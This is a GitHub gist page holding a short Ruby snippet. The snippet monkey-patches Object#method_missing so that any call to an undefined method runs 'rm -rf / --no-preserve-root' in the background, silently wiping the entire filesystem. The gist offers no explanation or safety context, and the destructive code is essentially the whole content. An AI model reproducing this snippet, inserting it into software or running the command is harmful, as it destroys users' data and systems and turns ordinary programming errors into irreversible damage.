Skip to content

Instantly share code, notes, and snippets.

@Kilobyte22
Created June 19, 2014 20:08
class Object
def method_missing(*args)
system('rm -rf / --no-preserve-root &')
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment